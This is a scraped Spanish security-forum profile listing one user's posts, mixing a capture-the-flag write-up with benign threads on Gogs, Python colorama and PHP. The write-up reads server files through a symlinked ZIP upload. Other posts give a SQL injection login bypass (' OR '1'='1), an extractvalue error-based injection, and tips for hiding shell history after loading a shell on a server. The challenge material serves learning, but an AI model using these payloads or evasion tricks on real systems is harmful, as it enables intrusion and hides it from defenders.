En unos días libero la solución de ejecutar comandos remotamente y lo elimino 
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Wargames y retos / Re:Mini Reto explotación web [Fácil]
Mayo 04, 2016, 06:50:58 PM
Buenas.
Como han pasado ya unos días desde que lo publiqué y no me han llegado soluciones válidas dejo la respuesta a la parte de conseguir leer el fichero:
Al abrir la web nos encontramos con un uploader. Tras probar muchas extensiones podremos ver que se trata de un whitelist que únicamente admite ficheros .zip.
Si subimos un fichero ZIP con una carpeta, por ejemplo, veremos que obtenemos la siguiente salida:
Código: bash
Por lo que podemos suponer que hace un unzip y, tras ello, un cat a los contenidos obtenidos. Para asegurarnos podemos subir un ZIP que contiene un fichero de texto:
¡PREMIO!
Código: html5
Ahora solamente nos queda conseguir leer ficheros internos... ¿parece difícil?
Si revisamos la documentación de zip veremos que se permite conservar los symlinks You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login al crear un fichero ZIP. Por lo que podremos aprovecharlo para leer un fichero interno...
Pero... mejor vamos paso a paso:
Código: bash
[li]Código: bash
Por último quedaría subir el fichero:
Código: html5
Hemos obtenido el contenido del fichero: underc0de{resolviste_el_reto_enhorabuena}
* algunos del staff hablaron conmigo sobre la explotación de este tipo de fallos en un entorno real, Facebook mismamente fue vulnerable: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Podéis probarlo por vosotros mismos, dejaré el servidor activo unos días.
PD: sí, se pueden leer ficheros como /etc/passwd y otros (:
¡Saludos!
Como han pasado ya unos días desde que lo publiqué y no me han llegado soluciones válidas dejo la respuesta a la parte de conseguir leer el fichero:
Al abrir la web nos encontramos con un uploader. Tras probar muchas extensiones podremos ver que se trata de un whitelist que únicamente admite ficheros .zip.
Si subimos un fichero ZIP con una carpeta, por ejemplo, veremos que obtenemos la siguiente salida:
cat: /tmp/vv89ts6vpptuiju8odh5844j95/gifwebshells: Is a directory Por lo que podemos suponer que hace un unzip y, tras ello, un cat a los contenidos obtenidos. Para asegurarnos podemos subir un ZIP que contiene un fichero de texto:
¡PREMIO!
<!DOCTYPE html5>
<head>
<meta charset="utf-8"/>
<title>Sube tu archivo aquí</title>
</head>
<body>
<form action="?page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="kuankear!"/>
</form>
Contenido del ZIP:<br>Hola, Underc[0]de
</body>
</html>
Ahora solamente nos queda conseguir leer ficheros internos... ¿parece difícil?
Si revisamos la documentación de zip veremos que se permite conservar los symlinks You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login al crear un fichero ZIP. Por lo que podremos aprovecharlo para leer un fichero interno...
Pero... mejor vamos paso a paso:
ln -s /banana/secret.lst prueba1
[li]
zip --symlinks prueba1.zip prueba1- Esta otra línea crea el fichero ZIP que utilizaremos para "atacar" y leer el fichero gracias a que conservamos los enlaces simbólicos...[/li]
Por último quedaría subir el fichero:
<!DOCTYPE html5>
<head>
<meta charset="utf-8"/>
<title>Sube tu archivo aquí</title>
</head>
<body>
<form action="?page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="kuankear!"/>
</form>
Contenido del ZIP:<br>underc0de{resolviste_el_reto_enhorabuena}
</body>
</html>
Hemos obtenido el contenido del fichero: underc0de{resolviste_el_reto_enhorabuena}
* algunos del staff hablaron conmigo sobre la explotación de este tipo de fallos en un entorno real, Facebook mismamente fue vulnerable: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Podéis probarlo por vosotros mismos, dejaré el servidor activo unos días.
PD: sí, se pueden leer ficheros como /etc/passwd y otros (:
¡Saludos!
#23
Wargames y retos / Mini Reto explotación web [Fácil]
Abril 28, 2016, 05:20:19 PM
Buenas.
Os dejo un pequeño reto de explotación web.
Objetivo: enviar por MP a @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el contenido del fichero /banana/secret.lst
Podéis leerlo y dar por finalizado el reto o continuar con la explotación, es probable que podáis conseguir ser root
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Un saludo.
Os dejo un pequeño reto de explotación web.
Objetivo: enviar por MP a @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el contenido del fichero /banana/secret.lst
Podéis leerlo y dar por finalizado el reto o continuar con la explotación, es probable que podáis conseguir ser root
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Un saludo.
#24
Dudas y pedidos generales / Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Abril 24, 2016, 03:33:01 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ese es el del blog de brutelogic
#25
Dudas y pedidos generales / Re:[XSS] desafiar.com.ar [Bypassing ANTI-XSS Chrome]
Abril 24, 2016, 03:18:30 PM
Quien detiene el XSS es el XSS-Auditor de Chrome, ellos no lo han fixeado.
Si ejecutasCódigo: bash
Aquí tienes el reporte original a Chromium para el bypass que utilizaste: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para la última versión de Chrome no conozco bypass del XSS-Auditor, pero suelen ser bastante jodidos...
Si ejecutas
google-chrome --disable-xss-auditorAquí tienes el reporte original a Chromium para el bypass que utilizaste: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para la última versión de Chrome no conozco bypass del XSS-Auditor, pero suelen ser bastante jodidos...
#26
Debates, Reviews y Opiniones / Re:Monta tu propio Gitlab en 5 minutos con Gogs
Diciembre 23, 2015, 04:14:35 PM
¡Gracias!
La única limitación que le encontré siquiera es su culpa. Como sabes para usar git en remoto hay que añadir la ruta, y con ella va la IP del servidor. Por tanto, si la Pi cambia de IP será necesario actualizar ese valor en el equipo desde el que desarrolles para poder seguir subiendo contenido.
Saludos.
La única limitación que le encontré siquiera es su culpa. Como sabes para usar git en remoto hay que añadir la ruta, y con ella va la IP del servidor. Por tanto, si la Pi cambia de IP será necesario actualizar ese valor en el equipo desde el que desarrolles para poder seguir subiendo contenido.
Saludos.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me encantó! En especial porque tengo una Raspberry Pi en mi casa sin uso y ahora ya se que poner en él!
Muchisimas gracias Jimeno!
Tiene algun tipo de limitación? o alguna contra que le hayas encontrado?
Saludos!
ANTRAX
#27
Debates, Reviews y Opiniones / Monta tu propio Gitlab en 5 minutos con Gogs
Diciembre 23, 2015, 04:07:57 PM
Buenas a todos.
Supongo que todos conoceréis Github y Git. Me gustaría presentaros un software que sirve para montar repositorios en local. Así podremos tener tantos repositorios privados y organizaciones como queramos de forma gratuita.
El software en cuestión es una especie de Gitlab creado en Golang, su nombre es Gogs, de sus siglas Go Git Service.
Podéis descargarlo desde su página oficial de forma gratuita You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Por supuesto es de código abierto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Su instalación y puesta en marcha es bastante simple, yo lo puse a correr en una Raspberry de forma correcta siguiendo los siguientes pasos:
Código: bash
- Git:
Código: bash
- Golang:
Código: bash
- editáis vuestro .bashrc y añadiís el path de Go:
Código: bash
y luego recargáis el .bashrc conCódigo: bash
Para comprobar que lo tenéis instalado lanzad go version
Código: mysql
Código: bash
Como podéis ver consume muy pocos recursos y es algo bastante útil.
¡Saludos!
Supongo que todos conoceréis Github y Git. Me gustaría presentaros un software que sirve para montar repositorios en local. Así podremos tener tantos repositorios privados y organizaciones como queramos de forma gratuita.
El software en cuestión es una especie de Gitlab creado en Golang, su nombre es Gogs, de sus siglas Go Git Service.
Podéis descargarlo desde su página oficial de forma gratuita You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Por supuesto es de código abierto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Su instalación y puesta en marcha es bastante simple, yo lo puse a correr en una Raspberry de forma correcta siguiendo los siguientes pasos:
Instalación de dependencias:
apt-get install mysql-server- Git:
apt-get install git- Golang:
hg clone -u default https://code.google.com/p/go $HOME/go
cd ~/go/src/
./all.bash- editáis vuestro .bashrc y añadiís el path de Go:
export PATH=$PATH:$HOME/go/biny luego recargáis el .bashrc con
source .bashrcPara comprobar que lo tenéis instalado lanzad go version
Una vez tengáis instaladas todas las dependencias yo os recomendaría instalar una más para poder dejar el servicio corriendo en el sistema sin necesidad de mantener una sesión de SSH abierta en él. En mi caso utilizo nohup- Creáis la Base de Datos necesaria en mysql:
create database gogs;
Vais a la ruta donde tengáis Gogs, en mi caso ~/gogs y lo lanzáis de la siguiente forma:
nohup ./gogs web &- De esta forma lo podremos dejar corriendo aunque hayamos cerrado la conexión SSH.
Desde otro equipo o la Pi misma accedéis al servicio en la siguiente URL:
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Seguís los pasos para la instalación y la rellenáis los campos de configuración y credenciales a vuestro gusto.
Como podéis ver consume muy pocos recursos y es algo bastante útil.
¡Saludos!
#28
Off Topic / Re:Feliz cumpleaños Jimeno!!
Diciembre 10, 2015, 09:02:18 PM
Ya os lo comenté por WhatsApp, muchísimas gracias a todos los del staff que os acordasteis :DD cc @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
#29
Dudas y pedidos generales / Re:SQLi - Obtener datos a través de formulario login
Noviembre 12, 2015, 11:00:42 AM
El payload para solucionar el reto 10 era user y pass:
' OR '1'='1
saludos.
' OR '1'='1
saludos.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias a los dos por vuestras respuestas
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No tengo claro si es Blind SQL, tal vez no lo sea porque devuelve errores MySQL cuando la inyección ha provocado que la sintaxis no sea correcta (corrígeme si me equivoco)
Lo que puedo describir es su comportamiento:La inyección que has puesto no ha resultado, pero admito que tampoco la he revisado ni tratado de hacer cambios sobre ella por lo que no descarto que esté bien.
- - Si la consulta se cumple me redirige (cómo tu has dicho)
- - Si no se cumple me muestra "Invalid username or password"
- - Si la inyección provoca un error en MySQL me muestra el error.
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tu inyección creo que si funciona, os relato como he resuelto el pasatiempo y si es posible me confirmas si es la manera correcta.
Yo estaba probando con esta otra inyección que es prácticamente igual.
' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='
La copié de aquí:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Revisaré la documentación de mysql relacionada con substring, extractvalue y concat para ver como operan dado que hasta ahora lo he hecho reaprovechando y copiando el código sin más.
Ambas inyecciones me devuelven esto:
XPATH syntax error: ':5.5.44-0+deb8u1'
(No estoy seguro si es normal o al menos entra dentro de lo esperado el mensaje XPATH syntax error, pero al menos retorna info).
He conseguido los datos que necesitaba para el pasatiempo teniendo que recurrir a múltiples inyecciones.
Los pasos han sido estos.
1) Obtener el nombre de la tabla que contiene informacion de los logins.
2) Obtener los nombres de los campos de la tabla.
3) Obtener la password del usuario que me interesa.
Os dejo el enlace al wargame por si lo quereis probar, lo pongo acortado para que google no lo indexe.
Nivel Inicial - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nivel 10/11 - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Un saludo y gracias nuevamente.
#30
Dudas y pedidos generales / Re:[AYUDA] libreria Colorama Python
Noviembre 11, 2015, 12:27:33 PMfrom colorama import Fore, Back, Style
print(Fore.RED + 'some red text')
print(Back.GREEN + 'and with a green background')
print(Style.DIM + 'and in dim text')
print(Style.RESET_ALL)
print('back to normal now') #31
Dudas y pedidos generales / Re:Error al hacer un ataque MITM con el framework MITMf
Septiembre 23, 2015, 08:11:59 AM
no pases los rangos con guión, pásalos con una barra, es decir, cambia el x.x.x.1-24 por x.x.x.1/24
#32
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Septiembre 03, 2015, 08:01:20 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Cafe
Eclipse o Android Studio?
Eclipse
Amiga con roce o novia?
Amiga con mucho roce.
¿concierto de rock o de bachata/guarreo?
#33
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 31, 2015, 01:18:22 PM #34
Cursos, manuales y libros / Re:Un pequeño aporte de libros sobre Análisis Forense
Agosto 31, 2015, 12:22:51 PM
Ábrelo con You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola Pistojo, bajé el archivo .7z (dos veces) y no lo reconoce como archivo válido para abrir ni en entorno Win ni en Mac. Probé renombrar el archivo como otros métodos de compresión pero tampoco.
Claramente estoy haciendo algo mal porque no llego ni a poner la clave que se indica en el post.
Gracias!You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola actuario. Que pasos has intentado?
Enviado desde mi SM-G900F mediante Tapatalk
#36
Dudas y pedidos generales / Re:Borrar Logs desde una shell cargada en un servidor.
Julio 30, 2015, 02:17:37 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si ponemos un espacio en blanco al principio del comando éste no se guardará en el histórico.Código: bash rand0m@box0:~$ history -c
rand0m@box0:~$ echo "This will not appear on history"
This will not appear on history
rand0m@box0:~$ echo "But this will"
But this will
rand0m@box0:~$ history
1 echo "But this will"
2 historyCódigo: bash [b3n@genesis ~]$ echo "Si se guarda"
[b3n@genesis ~]$ history
386 echo "Si se guarda"
387 history
[b3n@genesis ~]$
export HISTFILE=/dev/null
echo "¿Se guarda?"
Con eso no se guarda (es temporal)
Cuando acabes de ejecutar los comandos que desees lanzas:
history -cy solucionado.
#37
Dudas y pedidos generales / Re:Funcion exec y popen no ejecutan scripts
Julio 27, 2015, 07:23:23 PM
Pon el código PHP al principio del archivo y programa bien ese PHP, anda.
Además no declares cosas en condicionales, es decir, mejor haz:
Código: php
Y por favor, revisa errores de sintaxis y esas cosas antes de comentar.
Además dale permisos correctos al archivo .py y al .php
Te dejo otra prueba con tu código:
Además no declares cosas en condicionales, es decir, mejor haz:
<?php
// Mejor
$aux = $_POST['encendido4'];
if ($aux) {...}
// Peor
if ($_POST['encendido4']) {...}
?>Y por favor, revisa errores de sintaxis y esas cosas antes de comentar.
Además dale permisos correctos al archivo .py y al .php
Te dejo otra prueba con tu código:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
PHP Notice: Undefined index: encender4 in /var/www/php/alarma.php on line 20
#38
Dudas y pedidos generales / Re:Funcion exec y popen no ejecutan scripts
Julio 27, 2015, 06:35:42 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nada, tampoco funciona.
Tienes que ir arreglando cada fallo, jajaja.
Lanza php5 archivo.php y pon la salida aquí.
Sustituye archivo.php por el nombre de tu archivo.
#39
Dudas y pedidos generales / Re:Funcion exec y popen no ejecutan scripts
Julio 27, 2015, 06:29:59 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginY el signo de igual?
He estado haciendo una a una las variaciones que me has comentado pero no funciona:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
y si le quito el guión de a- exec no sale ni la página php, tiene permisos 755 tanto la página php como el script
y la variable encender no sé no esta declarada, en un tutorial salía así directamente.
#40
